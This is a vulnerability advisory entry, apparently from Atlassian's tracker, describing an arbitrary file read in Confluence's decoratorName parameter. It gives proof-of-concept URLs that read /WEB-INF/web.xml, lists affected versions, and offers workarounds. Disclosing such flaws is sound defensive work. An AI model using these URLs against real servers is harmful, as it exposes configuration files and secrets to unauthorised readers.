Lucene search

K
atlassianS3bap3767025197ATLASSIAN:CONF-39704
HistoryOct 27, 2015 - 7:37 p.m.

Insecure Direct Object Reference

2015-10-2719:37:15
s3bap3767025197
jira.atlassian.com
42

0.966 High

EPSS

Percentile

99.6%

The following URL is vulnerable to Insecure Direct Object Reference, allowing any authenticated user to read configuration files from the application such as the content of webapp directory in confluence.

http://<server>/spaces/viewdefaultdecorator.action?decoratorName=<FILE>
http://<server>/admin/viewdefaultdecorator.action?decoratorName=<FILE>

Where <FILE> any file readable by the user who runs the Confluence instance is accessible through Confluence itself.

PoC URL:
http://<server>/spaces/viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml
http://<server>/admin/viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml

This has been verified in confluence 5.9.1, 5.8.15, and 5.8.14

h2. Workarounds

  • Do not run Confluence as root/administrator. We always recommend creating a dedicated user account to run Atlassian products. You can limit the impact of this bug by restricting what the app user account can access.
  • Block URLs that match this pattern using proxy or load balancer rules.